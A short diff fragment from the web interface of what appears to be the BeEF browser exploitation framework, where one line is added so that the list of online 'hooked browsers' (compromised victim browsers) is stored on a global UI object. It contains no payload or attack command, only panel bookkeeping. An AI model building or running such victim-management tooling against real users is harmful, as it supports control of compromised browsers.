@@ -79,6 +76,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
this.updateZombies = function(zombies, rules){
var offline_hooked_browsers = zombies["offline"];
var online_hooked_browsers = zombies["online"];
beefwui.hooked_browsers = zombies["online"];
for(tree_type in this.zombies_tree_lists) {
hooked_browsers_tree = this.zombies_tree_lists[tree_type];

Some files were not shown because too many files have changed in this diff Show More